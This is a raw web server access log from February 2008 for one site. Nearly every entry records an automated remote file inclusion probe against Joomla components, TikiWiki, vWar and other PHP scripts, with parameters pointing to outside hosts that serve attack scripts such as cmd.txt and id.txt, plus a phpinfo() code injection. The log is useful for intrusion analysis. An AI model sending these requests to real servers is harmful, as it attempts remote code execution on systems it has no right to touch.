63.249.33.227 - - [14/Feb/2008:05:19:05 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:05:19:25 -0800] "GET /logs/access_071225.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:05:19:25 -0800] "GET //index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.58.242.138 - - [14/Feb/2008:05:19:26 -0800] "GET /logs//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:05:20:53 -0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.250.2.37 - - [14/Feb/2008:05:20:54 -0800] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:05:21:14 -0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
69.59.17.71 - - [14/Feb/2008:05:21:15 -0800] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:21:23 -0800] "GET /logs/access_080121.log/!scanhttp://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:21:23 -0800] "GET /!scanhttp://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:21:23 -0800] "GET /logs/!scanhttp://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:21:29 -0800] "GET /logs/access_080121.log/!scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:21:29 -0800] "GET /!scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:21:29 -0800] "GET /logs/!scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.247.138.125 - - [14/Feb/2008:05:21:30 -0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
63.247.138.125 - - [14/Feb/2008:05:21:30 -0800] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
207.58.141.232 - - [14/Feb/2008:05:22:21 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
207.58.141.232 - - [14/Feb/2008:05:22:21 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:22:40 -0800] "GET /logs/access_080130.log/!scanhttp://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:22:46 -0800] "GET /logs/access_080130.log/!scanhttp://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:23:08 -0800] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:23:08 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:23:08 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:24:02 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:24:02 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:24:02 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:05:24:07 -0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.15.38.90 - - [14/Feb/2008:05:24:08 -0800] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:24:09 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:24:09 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:24:09 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:05:24:16 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:24:48 -0800] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:24:50 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:24:55 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:05:25:05 -0800] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.86.123.61 - - [14/Feb/2008:05:25:05 -0800] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://users.volja.net/xmass/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:25:38 -0800] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.119.219.50 - - [14/Feb/2008:05:27:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:05:29:02 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.251.123 - - [14/Feb/2008:05:31:01 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [14/Feb/2008:05:31:02 -0800] "GET /logs/modifyform.html?code=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.251.123 - - [14/Feb/2008:05:31:13 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.193.223.100 - - [14/Feb/2008:05:32:59 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.193.223.100 - - [14/Feb/2008:05:32:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.13.230.99 - - [14/Feb/2008:05:33:31 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.13.230.99 - - [14/Feb/2008:05:33:31 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:05:34:39 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:05:36:01 -0800] "GET /logs/access_080120.log//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:05:36:01 -0800] "GET //starnet/themes/c-sky/main.inc.php?cmsdir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:05:36:01 -0800] "GET /logs//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.192.212 - - [14/Feb/2008:05:36:04 -0800] "GET /logs/access_080103.log//starnet/themes/c-sky/main.inc.php?cmsdir=http://www.suikki.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.128.49 - - [14/Feb/2008:05:38:02 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.send2thailand.com/image/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.11.230.89 - - [14/Feb/2008:05:40:19 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.pow.uaedesign.com/Images/eshop_2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:05:41:43 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:05:41:44 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:42:09 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:42:09 -0800] "GET /logs/access_080108.log/convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:42:09 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:42:09 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:42:09 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:42:09 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:04 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:05 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:05 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.139.170.85 - - [14/Feb/2008:05:43:25 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:40 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:53 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:54 -0800] "GET /convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:54 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:43:56 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.107 - - [14/Feb/2008:05:43:58 -0800] "GET /logs/access.log HTTP/1.0" 200 66251 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:44:09 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:44:09 -0800] "GET /convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:44:10 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.218 - - [14/Feb/2008:05:44:41 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/leeqn/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [14/Feb/2008:05:44:41 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/leeqn/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [14/Feb/2008:05:44:41 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/leeqn/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:44:54 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:44:54 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:44:55 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.120.50 - - [14/Feb/2008:05:44:56 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
204.15.120.50 - - [14/Feb/2008:05:44:57 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
89.149.197.252 - - [14/Feb/2008:05:45:10 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://j-vision.co.kr/company/mild/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:05:45:12 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:05:45:31 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:05:45:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
213.193.223.100 - - [14/Feb/2008:05:45:32 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
213.193.223.100 - - [14/Feb/2008:05:45:33 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:45:40 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:45:43 -0800] "GET /logs/access_071214.log///chat/inc/cmses/aedating4CMS.php?dir[inc]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:45:44 -0800] "GET ///chat/inc/cmses/aedating4CMS.php?dir[inc]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:45:44 -0800] "GET /logs///chat/inc/cmses/aedating4CMS.php?dir[inc]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.163.232 - - [14/Feb/2008:05:45:57 -0800] "GET /logs/access_071221.log/convert/mvcw.php?vwar_root=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.13.230.99 - - [14/Feb/2008:05:46:06 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
64.13.230.99 - - [14/Feb/2008:05:46:06 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:05:46:14 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:05:46:14 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:05:46:14 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:46:34 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:46:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.9.159.213 - - [14/Feb/2008:05:46:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:46:39 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:46:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.69.32.173 - - [14/Feb/2008:05:46:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:48:10 -0800] "GET /logs/access_071219.log///chat/inc/cmses/aedating4CMS.php?dir[inc]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:49:03 -0800] "GET /logs/access.log/faqsupport/samplefaqsupport.php?path[docroot]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:49:03 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.150.160.16 - - [14/Feb/2008:05:49:04 -0800] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.40.23.83 - - [14/Feb/2008:05:49:20 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.178.114 - - [14/Feb/2008:05:49:23 -0800] "GET /index3.php?http://1337h4x.dyndns.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
